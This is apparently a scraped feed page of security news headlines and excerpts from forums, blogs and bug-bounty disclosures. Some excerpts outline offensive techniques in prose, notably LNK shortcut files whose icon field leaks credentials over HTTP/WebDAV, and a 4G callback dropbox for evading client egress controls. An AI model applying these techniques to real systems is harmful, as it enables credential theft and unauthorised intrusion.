    Looking for some hardware advice for a pen test dropbox. I'd like the unit to be responsive with desktop-speed chipsets, x86/x64 based, and have an out-of-band 4G SIM callback for when client networks prevent outbound connectivity. With Windows as the primary OS, is there any way to auto connect the 4G/cellular modem with Windows, as there is with Linux (ie wvdial)? Are there any capable NUC type devices or mini PCs with inbuilt 4G capability. Want to avoid having USB modems sticking out the side, perhaps similar to rPi's cellular hat, but not rPi (or other SBCs) which would struggle with a Win with Kali VM setup. Happy to spend a bit on hardware, are there many notable boxes other than the Intel NUC, Zotac Zbox or MSI Cubi? Seen a few decent build docs that almost fit the bill, but not quite: https://infosecwriteups.com/part-2-build-the-pen-test-drop-box-69278526886a https://www.blackhillsinfosec.com/pentesting-dropbox-on-steroids/ https://www.blackhillsinfosec.com/how-to-build-your-own-penetration-testing-drop-box/ https://www.sprocketsecurity.com/blog/penetration-testing-dropbox-setup-part1 Thanks! submitted by /u/ama21n [link] [comments]  ( 1 min )
    Would a "technical support specialist" be a good start to eventually end up in cyber security?
    Hello. I'm graduating college soon and have an offer as a support specialist. The responsibilities are as follows: Provide 1st-tier technical support for production support issues Troubleshoot system errors by reviewing technical logs, system documentation, and application logic Monitor and triage errors generated by automated tasks in production Collaborate with Client Excellence team to ensure users’ technical support issues are resolved quickly On call rotation for urgent production issues during weekends and holidays I've been applying to IT jobs but have had little luck. Would a job like this be a good interdiction into security? Or should I look for a more traditional IT job? submitted by /u/Hellothere6667 [link] [comments]  ( 1 min )
  • Open

    LNK Files, Again
    What, again?!?! I know, right?!? Not long ago, I read this fascinating article from Joe Helle that discussed malicious uses for Windows shortcuts, or LNK files, and also discussed a Python3 scripts called "lnkbomb". As a side note, check out what Joe had to share about persistence via WSL2! As anyone who's followed me for a minute knows, I love...L   O   V   E...me some LNK files. Shortcut files are something that we see all the time, have been around for a long time (much like ADSs), but folks in the DFIR field are so focused on the "shiny hot newness", that this file type is very often overlooked and not fully exploited. The technique Joe discusses is similar to modifying the iconfilename field of a shortcut file, so that even if the "bad guy" is evicted from an infrastructure, any action that launches the LNK file results in credentials being passed via HTTP or WebDAV, where they can be collected, cracked, and then used by the threat actor. LNK files have a lot of uses, and understanding the format and structure is helpful in a lot of different ways. One example is that automatic JumpLists follow the OLE/structured storage format, and all but the DestList stream consist of LNK file formatted streams. Another example is that the building blocks of LNK files, shell items, are also the core building blocks of several Registry-based artifacts, such as shellbags. Beyond that, however, threat actors have used LNK files as lures in social engineering and phishing attacks; this means that the threat actor has built the LNK files within their own infrastructure, within their own development environment. As such, sending these files as lures is "free money" to both DFIR and CTI analysts, if they're able to leverage those files and their component metadata. So...while I know Windows 11 is out, and everyone's excited about the shiny new hotness, let's not forget that there's a lot that has worked since Windows XP (or even prior to that) and still continues to be an issue today.  ( 4 min )
  • Open

    Honeypot OSINT
    In this post I will be going through the open source intelligence process I went through following an attack performed against my honeypot. Continue reading on Medium »  ( 8 min )
    Building a public OSINT lab target
    The Utah Valley University Cyber Security Program needed a realistic target that students could use to learn OSINT and offensive tools… Continue reading on Medium »  ( 1 min )
    [EN] TryHackMe 25 Days of Cyber Security: Day 14 Walkthrough
    [Day 14] OSINT Where’s Rudolph? Continue reading on Medium »  ( 3 min )
    Tallin To Search More Churches — OSINT Challenge 14
    On Dec 27, 2021, OSINT Dojo shared a OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken. Please… Continue reading on Medium »  ( 1 min )
  • Open

    Adding customers to victim’s store via Insecure Direct Object Reference
    Hello! I am back with my 2nd bug bounty write up. This time I’ll be showing you how I found an Insecure Direct Object Reference bug on an… Continue reading on Medium »  ( 1 min )
    QRCDR Path Traversal Vulnerability
    QRCDR is a popular PHP — JavaScript QR-Code Generator, which is widely used for creating customized QR-Code in easy steps. also, it’s used… Continue reading on Medium »  ( 2 min )
    Hacking ticketastic
    Hi guys! I’m back with another great blog, with this blog you can learn more about SQLi and Cross Site Request Forgery (CSRF). Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 7
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web technologies required for starting with the web Exploitation Part-2
    Hello Myself Manan Aggarwal is here to present the Blog about the Basic Web technologies required for starting with the web Exploitation… Continue reading on Medium »  ( 4 min )
    Introduction to Spring Boot Related Vulnerabilities
    Spring Boot related vulnerability learning materials, collection of utilization methods and skills, black box security assessment checklist Continue reading on Medium »  ( 12 min )
    iOS jailbreak dev wins $2M bounty for finding critical Optimism bug
    Continue reading on Medium »  ( 2 min )
    VulnLab SQL Injection— Dynamic Application Security Testing #3
    Assalamualaikum Wr.Wb Continue reading on Medium »  ( 6 min )
  • Open

    Amcache SHA-1 mismatch
    Hoping someone has seen this or has an idea what may be happening. I am performing a review and identified an installer file as an item of interest. I see the file in the host’s Amcache hive with a SHA-1 (“A”) hash. However, the recovered file has a different SHA-1 hash on disk (“B”). When running the executable on my test system and comparing it to that test machine’s Amcache, I see the same behavior. Amcache has hash “A” and the executable has hash “B.” Every other program I’ve sampled has hash matches; it seems like just this one is off. What gives? For specifics, I am using RegistryExplorer and Amcache Parser (both Zimmerman tools) for Amcache analysis. I am hashing with both X-Ways and Hasher (also Zimmerman). When reviewing Amcache Parser, I am matching the hash to the executable …  ( 3 min )
    Does anyone have Magnet Acquire download link without filling the form?
    I can't afford the axiom (or whatever it is called) so can anyone provide me the link? Thank you so much! submitted by /u/Hopelessssssssss [link] [comments]  ( 1 min )
    Announcing Opensource X-Ways HashExporter Extension
    This opensource extension allows you to dump all the hashes from an image using X-Ways command-line. https://github.com/PolitoInc/X-Ways-HashExporter-Extension submitted by /u/Alarming_Arm_7724 [link] [comments]  ( 1 min )
    What program should I specialize in if I cannot chose digital forensics?
    Computer Science and Engineering with specialisation in Blockchain Technology Computer Science and Engineering with specialisation in Information Technology Computer Science and Engineering with specialisation in Data Science. Or does it not matter as long as it is Csc ? submitted by /u/nodogsareevil [link] [comments]  ( 1 min )
    What transferable skills does forensics provide?
    I am currently a digital forensic analyst of both phones and computers for law enforcement. I want to transition into a new tech role, such as infosec or another form of cyber sec but looking at the job specs for 90% of these roles I do not meet the requirements. I’m considering self funding a cert such as CISSP or Security+ as this will most likely help. What sort of jobs can my current role land me in? submitted by /u/gofigured21 [link] [comments]  ( 3 min )
    CHFI Content Weightage
    Hello, Can we guess the content weightage of CHFI in the actual exam? I mean how can we know which modules will have more questions and other modules will have fewer questions in exam? I need to take the test and the book is very lengthy that can't be read as a whole so I want to get info about modules' weightage so I can learn them first (which will have more questions in the exam) and then the remaining modules (which have fewer questions). If not exactly any guess about it? submitted by /u/hardfire005 [link] [comments]  ( 1 min )
    Learning DFIR?
    Hi everyone. I am eJPT certified and been doing tryhackme for a year now. I want to move towards blue side, especially forensics and incident response. What i wanna ask is what is best resource/website to learn dfir/soc etc Is CHFI course content good? Are elearn security forensics and incident response courses and certs valuable? Or should i stick with tryhackme (it has less content regarding blue teaming) I have also heard of securityblueteam so is the investment there invaluable? Thanks submitted by /u/Nightkinnng [link] [comments]  ( 1 min )
  • Open

    CALISHOT 2022-02: Find ebooks among 348 Calibre sites this month
    submitted by /u/krazybug [link] [comments]  ( 1 min )
    archaeological dig photos from Iraq
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    [q] Index template/website script
    Hi guys, I hope this is the correct place to ask; I want to make a website where I can index certain posts and urls. (like a blog but easier) could you please guide me? ​ tyvm submitted by /u/zuperfly [link] [comments]  ( 1 min )
    A way to clone an Open Directory?
    Is there a can clone/upload all the files from an OD to my shared google drive? i know about rclone but since it's not easy to use, i don't want to waste time with it if can't do the required task. + Is there a tool that can upload a shared google drive file to my shared drive? again, i know about "make a copy option" but that is not usable if the file is over the size of the free space you drive has. submitted by /u/CompetitiveMango12 [link] [comments]  ( 2 min )
  • Open

    Discoverability by phone number/email restriction bypass
    Twitter disclosed a bug submitted by zhirinovskiy: https://hackerone.com/reports/1439026 - Bounty: $5040
    Able to detect if a user is FetLife supporter although this user hides their support badge in fetlife.com/conversations/{id} JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1423704 - Bounty: $100
    Information Exposure Through Directory Listing vulnerability
    Nextcloud disclosed a bug submitted by technorat: https://hackerone.com/reports/1476709
  • Open

    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    🔥🔥 A new version 0.1.3 released for Kubesploit: a post-exploitation framework for Kubernetes🔥🔥
    submitted by /u/kubiscan [link] [comments]
    Retrieving Syscall ID with Hell's Gate, Halo's Gate, FreshyCalls and Syswhispers2
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-02-11 Review
    [HTB] Love Writeup by 0x584a PendingIntent重定向:一种针对安卓系统和流行App的通用提权方法 by ourren 自动机器学习的安全风险 by ourren 解构开源IAST 打造安全灰盒利器 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    FreeBuf早报 | 上海一程序员删库跑路被判10个月;500家电商网站被植入信用卡窃取程序
    一名29岁的程序员录某未经公司许可,在离职当天,私自将即将上线的京东到家平台系统代码全部删除。  ( 1 min )
    Fake dnSpy - 这鸡汤里下了毒!
    dnSpy是一款流行的用于调试、修改和反编译.NET程序的工具。网络安全研究人员在分析.NET程序或恶意软件时经常使用。  ( 1 min )
    黑客攻击欧洲港口石油设施致油价飙升、上海首份《企业数据合规指引》出台、微软计划收购网络安全公司|网络安全周报
    2022年2月7日至2月11日共收录全球网络安全热点8项,涉及微软、Mandiant、Puma、Swissport等。  ( 1 min )
    法国监管机构称谷歌分析存在数据隐私风险
    法国监管机构认为,该项服务在数据传输时没有采取足够的措施保障数据隐私权,可被美国情报机构利用。
    Kimsuky 正在使用 xRAT 进行窃密
    近日,ASEC 分析人员发现 Kimsuky 组织正在使用 xRAT(基于 Quasar RAT 定制的开源 RAT)恶意软件。  ( 1 min )
    Arid Viper APT 组织针对巴勒斯坦发起攻击
    Arid Viper 组织利用最初发布在土耳其国营通讯社 Anadolu 和巴勒斯坦 MAAN 发展中心的内容为诱饵,针对巴勒斯坦的机构发起攻击。  ( 1 min )
    FreeBuf周报 | 超50万人受Morley勒索软件攻击影响;黑客攻击欧洲港口石油设施
    商业服务公司Morley Companies披露了一起用户数据泄露事件,大量用户数据被窃取。  ( 1 min )
    浦发银行信用卡中心诚聘信息安全工程师
    上海浦东发展银行信用卡中心诚聘信息安全工程师。
    工信部就《工业和信息化领域数据安全管理办法(试行)》再次征求意见
    《管理办法》共八章四十一条,并强调重要数据和核心数据应按照相应法律、法规在境内存储,或依法依规进行数据出境安全评估。  ( 1 min )
    浅谈musl堆利用技巧(DEBUG篇)
    最近比赛出的musl题型的越来越多,不得不学习一波musl的堆利用来应对今后的比赛。  ( 1 min )
  • Open

    AppSec best practices for security that sticks
    In the complex and dynamic world of application security, best practices are your best friends. This post shows how you can build an effective AppSec program based on tried and tested workflows and tools for vulnerability testing and remediation. READ MORE  ( 6 min )

  • Open

    How to crack RSA-512 on off-the-shelf hardware in 4 days
    submitted by /u/ScottContini [link] [comments]
    Five Vulnerabilities Explained in Moxa MXview for OT Networks
    submitted by /u/h4ck3dit [link] [comments]
    Safer entropy accumulation in Linux 5.18's RNG
    submitted by /u/zx2c4 [link] [comments]  ( 1 min )
    what is Walkme Extension used for? I have it installed and enforced by default without ability to disable it - in all Chrome browsers on the work laptop...
    submitted by /u/One-World-One-Love [link] [comments]  ( 1 min )
    🇬🇧 Gaining the upper hand(le) - Hunting for privilege escalations and UAC bypasses by looking for leaked handles in unprivileged processes by @APTortellini and @last0x00
    submitted by /u/last0x00 [link] [comments]  ( 1 min )
    Firejail oopsie
    submitted by /u/MonkeeSage [link] [comments]
  • Open

    Fuzzing for XSS via nested parsers condition
    Article URL: https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/ Comments URL: https://news.ycombinator.com/item?id=30292426 Points: 1 # Comments: 0  ( 5 min )
  • Open

    CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module Since 4.8
    Article URL: https://www.openwall.com/lists/oss-security/2022/02/10/1 Comments URL: https://news.ycombinator.com/item?id=30291958 Points: 2 # Comments: 0  ( 6 min )
  • Open

    MakerDAO Launches $10m Bug Bounty On Immunefi
    Immunefi has grown by leaps & bounds since we first launched in December 2020 and now protects over $100 billion (that’s Billion with a B)… Continue reading on Immunefi »  ( 2 min )
    Programming languages and Cybersecurity
    Codes are fundamental blocks of logic which drives businesses all around the world today. Continue reading on Medium »  ( 6 min )
    100 Days of Hacking - Day 6
    Objectives of day 6 : Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — Day 5
    Objectives of day 5 : Continue reading on Medium »  ( 1 min )
    Launching Superfluid Bug Bounty Program with Immunefi
    Our mission to establish the Superfluid Protocol as a key component of the financial rails of the future requires more than technological… Continue reading on Superfluid Blog »  ( 3 min )
    Buy any Products For Free From Bewakoof.com || Bug-Bounty $$
    Hi, Here we will see how you can buy any product for free from Bewakoof.com Continue reading on Medium »  ( 2 min )
    Internet-Wide Study: State Of SPF, DKIM, And DMARC — RedHunt Labs
    At RedHunt Labs, (under Project Resonance), we frequently conduct internet-wide research in different shapes and formats to understand the… Continue reading on Medium »  ( 7 min )
    كيف حصلت على 2500 دولار من اكتشاف الثغرات
    السلام عليكم ورحمة الله وبركاته Continue reading on Medium »  ( 1 min )
  • Open

    Are there only 2 types of people in this world? — An OSINT analysis
    Today as I was scrolling through my LinkedIn’s home feed I came across this image that had been liked by someone from my network. Continue reading on Medium »  ( 3 min )
    Cyberspace Vault Osint
    Task Continue reading on Medium »
  • Open

    [h1-2102] Information disclosure - ShopifyPlus add user displays existing Shopify ID fullname
    Shopify disclosed a bug submitted by francisbeaudoin: https://hackerone.com/reports/1083922 - Bounty: $1900
    Bypass For #997350 your-store.myshopify.com preview link is leak on third party website Via Online Store
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1015283 - Bounty: $500
    Password reset token leak via "Host header" on third party website
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1092831
    Orders full read for a staff with only `Customers` permissions.
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1392032 - Bounty: $800
    Critically Sensitive Spring Boot Endpoints Exposed
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1022048 - Bounty: $5000
    Sending Arbitrary Requests through Jupyter Notebooks on gitlab.com and Self-Hosted GitLab Instances
    GitLab disclosed a bug submitted by iwis: https://hackerone.com/reports/970869 - Bounty: $1500
    Installing Gitlab runner with Docker-In-Docker allows root access
    GitLab disclosed a bug submitted by jafarakhondali: https://hackerone.com/reports/1417211 - Bounty: $100
    Node.js Certificate Verification Bypass via String Injection
    Node.js disclosed a bug submitted by bengl: https://hackerone.com/reports/1429694
  • Open

    RCE vs Code Injection
    Hi, what's the difference between RCE and Code Injection ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    What is the type of vulnerability called where you put the wrong file extension in the URL on a file that you shouldnt have access to?
    I accidentally discovered something like that during a very beginners CFT challenge. We were supposed to do an SQL injection to get a config file but I for some reason put config.php in the URL and got the file to the browser. I reported it to the people holding the CFT and they said they reported it to the maker of the serversoftware. I believe the software was opensource so it would be fun to find a note somewhere that they fixed it. That is why I wonder what this type of vulnerability is called. submitted by /u/HugoTRB [link] [comments]  ( 2 min )
    What’s your pentesting workbench?
    I am going to create a set of servers for pentest and I would like your suggestions/advice/comments. I would buy three servers , one for exploit dev /marvel analysis preferably a debian(kali or Ubuntu ) and other two for pentesting . submitted by /u/Sea_Finish6689 [link] [comments]  ( 3 min )
  • Open

    Email Forensics CTF Now Live
    Hello, folks! Our Email Forensics Capture The Flag Competition is now live! The event comprises weekly challenges for ten weeks. https://m.klr.co/kMhMA Good luck, and have fun! submitted by /u/MetaspikeHQ [link] [comments]  ( 1 min )
    Black screen and flashing cursor on boot when running SIFT Workstation in VirtualBox
    I'm not sure if this is the correct place to post, apologies if it isn't. I have downloaded the SIFT Workstation OVA file from Sans website and opened it in VirtualBox. I get a boot menu where I can either just start Ubuntu or run the memory test application. Choosing Ubuntu, I just get a black screen with a flashing underscore cursor in top left corner. It has been standing there for 10 minutes now and nothing happens. It never gets to the logon screen. I have seen others mention the issue when searching for it, but I haven't found any mentioned solutions. Any ideas? submitted by /u/kennethfinnerup [link] [comments]  ( 1 min )
    Question about $Ntuninstall files..
    So I was nosing around an old HDD that had XP installed , and I come across these folders in the WINDOWS directory. Inside them, there are files called “spuninst”. So I open them in notepad and there is a system.snapshot heading with a bunch of programs and such listed. My first question is- Is this every program that was installed at this particular moment in time on the computer? Is there way to see when past programs were installed and subsequently deleted if there are no files to look at creation dates? Thanks for any help submitted by /u/Pubh12 [link] [comments]  ( 1 min )
  • Open

    Vulnerability Reward Program: 2021 Year in Review
    Article URL: https://security.googleblog.com/2022/02/vulnerability-reward-program-2021-year.html Comments URL: https://news.ycombinator.com/item?id=30289291 Points: 1 # Comments: 0  ( 12 min )
    Responding to and Learning from the Log4Shell Vulnerability
    Article URL: https://www.hsgac.senate.gov/hearings/responding-to-and-learning-from-the-log4shell-vulnerability Comments URL: https://news.ycombinator.com/item?id=30284252 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SecWiki News 2022-02-10 Review
    Top 10 web hacking techniques of 2021 by ourren A Tale of DOM-based XSS! by ourren 利用RITA检测beacon通信 by ourren CVE-2021-33742:Internet Explorer MSHTML堆越界写漏洞分析 by ourren 企业面对APT化攻击的防御困境 by ourren CobaltStrike 区块链网络上线方式及检测 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Lots of porn photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
    [NSFW} nastyflixxx.net
    http://www.nastyflixxx.net/clips/?C=S;O=A submitted by /u/mrcave81 [link] [comments]
    Some NOAA Hurricane Files
    https://www.nhc.noaa.gov/video/ Nothing really that interesting submitted by /u/420danger_noodle420 [link] [comments]
    FTP of a Russian ISP (Ufanet)
    You can find some good stuff in it I thinks ? http://ftp.ufanet.ru/ Url: http://ftp.ufanet.ru/ Urls file Extension (Top 5) Files Size .iso 363 384,42 GiB .xz 283 105,96 GiB .img 136 52,78 GiB .tar 16 647 29,78 GiB .bz2 112 29,21 GiB Dirs: 10 532 Ext: 188 Total: 24 123 Total: 664,74 GiB Date (UTC): 2022-02-10 01:01:31 Time: 00:03:28 Speed: 2,01 MB/s (16,1 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    Some site's wp-content/uploads pages
    https://www.the8bitguy.com/wp-content/uploads/ ​ https://tomorrowcorporation.com/blog/wp-content/uploads/ submitted by /u/ilikemacsalot [link] [comments]
    Informatic related Stuff (In French)
    https://download.d-l.fr/apache_listing/ or https://download.d-l.fr (It's the same content but different UI ) http://s472165864.onlinehome.fr/anywarare/index.php?dir=| Url: https://download.d-l.fr/apache_listing/ Urls file Extension (Top 5) Files Size .iso 112 233,52 GiB .zip 101 24,71 GiB .exe 169 17,93 GiB .xz 7 4,65 GiB .1 1 4,4 GiB Dirs: 150 Ext: 46 Total: 572 Total: 296,05 GiB Date (UTC): 2022-02-10 00:55:22 Time: 00:00:35 Speed: 23,48 MB/s (187,8 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) Url: http://s472165864.onlinehome.fr/anywar... Urls file Extension (Top 5) Files Size .zip 808 69,32 GiB .iso 26 63,33 GiB .exe 604 60,11 GiB .001 2 6,6 GiB .002 2 6,4 GiB Dirs: 285 Ext: 23 Total: 1 868 Total: 212,62 GiB Date (UTC): 2022-02-10 00:59:03 Time: 00:00:09 Speed: Failed Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    Watch "Welcome to C0V3RT - Exploration of ALL THINGS "Covert Entry"" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
    Dump Information for Process using GetTokenInformation
    In this post, you will get a very thorough step-by-step walkthrough on building your own process token dumper in the c++ which will help you in knowing your target better before launching another post exploitation attack. https://tbhaxor.com/dumping-token-information-in-windows/ submitted by /u/tbhaxor [link] [comments]
  • Open

    福利 | 缤纷优选,乐享元宵——来FB商城一起过节吧!
    2.14-2.17,来FB商城过元宵吧
    克隆版海盗湾网站正对数百万用户传播恶意广告
    据Cyber​​News安全研究人员发现,5个伪装成著名BT盗版资源网站海盗湾的恶意站点,每月向超过700万名用户提供恶意广告。  ( 1 min )
    《广东省公共数据安全管理办法(征求意见稿)》发布,强调公共数据的安全性
    《征求意见稿》共六章三十二条,加强数字政府公共数据安全管理,规范公共数据处理活动,促进数据资源有序开发利用,保护个人、组织的合法权益。
    记一次挖矿病毒的应急响应
    记一次挖矿病毒的应急响应  ( 1 min )
    小程序测试流程
    流程分为两个方面,解包可以挖掘信息泄露问题、隐藏的接口,抓包可以测试一些逻辑漏洞、API安全问题。  ( 1 min )
    Windows 11更新要小心了,恶意软件已经盯上它
    就在Windows 11系统广泛部署阶段,RedLine恶意软件团伙已经悄悄盯上了这波更新,已经做好了充足的攻击前准备。  ( 1 min )
    FreeBuf早报 | 英特尔发现16个与BIOS相关的新漏洞;海盗湾克隆针对数百万用户使用恶意软件
    CyberNews 的研究人员发现了五个海盗湾的克隆版本,每个月向超过 700 万用户提供恶意广告。  ( 1 min )

  • Open

    Is there a way to find out what server/ip adrdress a program accesses?
    I'm trying to find the server so I can ping to that manually but I don't know if that's possible. I'm almost a beginner in this, I want to know the pinging time. submitted by /u/Mayhem_8116 [link] [comments]  ( 1 min )
    Why is it common practice to reset a password after a few failed attempts?
    Hi Netsec people! Every once in a while I will get emails saying that some website/service I’m registered on has reset my password because of too many failed log in attempts. Now I’m not too surprised by the attempts, since according to HaveIBeenPwned, my credentials have been ‘exposed’ over 30 times in breaches dating back to the early 2010s. However, a while back I gave up my terrible practice of using 1 password across multiple services and migrated to using a password manager, and now all of my passwords to every service I’m on are randomly generated, so I’m not too worried by these attempts. My question is this: Why does the most common practice seem to be for services to reset your password after a few failed attempts? To me that seems like if x log in attempts failed, the password was robust/held up—why force the user to change it? If the user used a random generator, repeated tries that are time separated (I.e. wait 10min before trying again) probably won’t get an attacker anywhere. If a person isn’t using a password manager/generator then forcing the user to reset might actually lead them to use a weaker password since they will have to come up with something familiar, and there are only so many familiar items a person can keep track of at a time… I’d love to hear some insights on to why this reset after x tries approach appears to be such a pervasive (and counterintuitive) practice! Sorry if this isn’t the right place for a question like this! submitted by /u/KrishanuAR [link] [comments]  ( 2 min )
    Hosts making DNS queries to malicious site. How to dig deeper and find source?
    I have some infected hosts in LAN making a communication with C&C server and bots but that URL seems to be hidden behind Cloudflare CDN as per wireshark sniffing on infected host. In other words, I must say hosts are making DNS queries to malicious site. Our PAs with DNS filtering has blocked the domain since it flagged as malicious How I can find the source of infection on the host ? Any tools I can use which process or application making DNS queries ? Any advise how to dig deeper and what process is making these queries so we can get rid of these logs ? submitted by /u/techno_it [link] [comments]  ( 3 min )
    Does this report that Palestinian threat actor is behind new Mid East phishing attacks sound right?
    Known Palestinian threat actor MoleRats is likely behind a recent malicious email campaign targeting Middle Eastern governments, foreign-policy think tanks and a state-affiliated airline with a new intelligence-gathering trojan dubbed NimbleMamba, researchers said via Threatpost. https://threatpost.com/molerats-apt-trojan-cyberespionage-campaign/178305/ submitted by /u/Technical-Tea-4902 [link] [comments]  ( 1 min )
    RCE vs Command Injection
    Hi, what's the difference between RCE and Command Injection ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Setting up a security program
    So a long time ago some of the higher ups decided we should have a security program within our product development, the idea was that there would be one person in each scrum team responsible for promoting security and they would get some additional training to help with that. Like a lot of these central programs it continued for a few months and then was quickly forgotten about. Now I've been tasked with setting up our own version in the division as the central version is pretty much dead but they're still pushing the general idea. This is what is currently on my list - Security champions to be Security+ certified (I know it's a broad basic cert but I figure we can get funding for this and then progress to more advanced targeted training) - Add a method into Jira for tracking security related issues separately - Create discrete security projects as epics so we can fix some of the legacy issues completely and not worry about them anymore (current ideas for these include: removing third party services to reduce exposure, updating some very old libraries, updating SQL user security etc) Any other ideas of things I could introduce? submitted by /u/dbxp [link] [comments]  ( 3 min )
    CVSS calculation weight reasoning
    Hello AskNetsec. I was wondering if there is a resource describing the CVSS calculation reasoning. Not just how the CVSS is calculated by also the reasoning behind the weight of the different variables. For example in the specification (https://www.first.org/cvss/specification-document) under "CVSS v3.1 Equations", WHY is ISS = 6.42 * ISS? Where does 6.42 come from. Is there any research paper or whitepaper for this? submitted by /u/someuserman [link] [comments]  ( 1 min )
    Question patching build-in python on macOS
    Do I need to patch / install a new version of Python manually, in order to fix the vulnerability of Python on my macOS? For example, my macOS is upgraded to Monterey 12.1, but my Python version is still 3.7.9, which is vulnerable to CVE-2021-3177. I tried to search the vulnerability, say CVE-2021-3177 is that affected my version of macOS. However, Apple seems didn't put that information into their security update documentation. submitted by /u/20151124 [link] [comments]  ( 1 min )
  • Open

    npm weak links
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]
    New release of 🔥Kubesploit v0.1.3🔥
    submitted by /u/jat0369 [link] [comments]
    Top 10 web hacking techniques of 2021
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    My SQLi adventure or: why you should make sure your WAF is configured properly
    submitted by /u/gsk-upxyz [link] [comments]
  • Open

    Is the Google Bucket Meant To Be Publicly Listable? https://cdn.shopify.com/shop-assets/
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102546 - Bounty: $500
    staffOrderNotificationSubscriptionDelete Could Be Used By Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102660 - Bounty: $500
    staffOrderNotificationSubscriptionCreate Is Not Blocked Entirely From Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102652 - Bounty: $900
    Race condition in User comments Likes
    Zomato disclosed a bug submitted by 0xdexter: https://hackerone.com/reports/1409913 - Bounty: $150
    Reflected xss on ads.tiktok.com using `from` parameter.
    TikTok disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1452375 - Bounty: $6000
  • Open

    Coordinated vulnerability disclosure (CVD) for open source projects
    Article URL: https://github.blog/2022-02-09-coordinated-vulnerability-disclosure-cvd-open-source-projects/ Comments URL: https://news.ycombinator.com/item?id=30278015 Points: 1 # Comments: 0  ( 8 min )
  • Open

    Basic Web Technologies Knowledge required for starting with the web Exploitation Part 1
    Hello Guys Myself Manan Aggarwal BTech Student is here Present you the information about the Basic Technology which you need to require… Continue reading on Medium »  ( 4 min )
    Hacking with Rake
    Rake is a utility that can be used to automate tasks. For a example, if program needs to be set up in a certain way. Rake could be used to… Continue reading on Medium »
    How i made 15k$ from Remote Code Execution Vulnerability
    Hello Everyone 👋 Continue reading on Medium »  ( 1 min )
    How I hacked Google to read files from their servers for free!
    Hey Guys, This is Harish! I used to hunt to Microsoft and Google VRP, This is my first write up! Continue reading on Medium »  ( 1 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it. Continue reading on InfoSec Write-ups »  ( 3 min )
    QuickSwap’s New UI Alpha $50,000 Bug Bounty
    TL; DR: Continue reading on Medium »  ( 1 min )
    XDAG new version of wallet (0.4.0) officially released
    Repost of the 2011–11–05 news on xdag.io Continue reading on Medium »  ( 1 min )
    XDAG Mars Project
    repost of 2021–05–09 news on xdag.io Continue reading on Medium »  ( 4 min )
    XDAG Java Edition Testing Tutorial
    Hello to all, As some of you know, we are currently working on making the project more attractive to developers. Continue reading on Medium »  ( 2 min )
    Login function module: User Authentication .
    Input: User id and Password SQL: select * from admin where user_id = 'admin' and password=’****' Continue reading on Medium »
  • Open

    Introducing BloodHound 4.1 — The Three Headed Hound
    Prior Work Continue reading on Posts By SpecterOps Team Members »  ( 3 min )
    CRTO Review (Certified Red Team Operator)
    I had a certificate by successfully completing the CRTO exam in the past days, and while my knowledge was still fresh, I decided to write… Continue reading on Medium »  ( 4 min )
    Raspberry Pi Pico as a Rubber Ducky
    Kurulum Continue reading on Medium »  ( 1 min )
  • Open

    RootMe | TryHackMe Walkthrough
    Write-ups TryHackMe Challege  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSql Injection, as you know this is my first time of NoSql Injection, so I was learning a lot from tryhackme.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    RootMe | TryHackMe Walkthrough
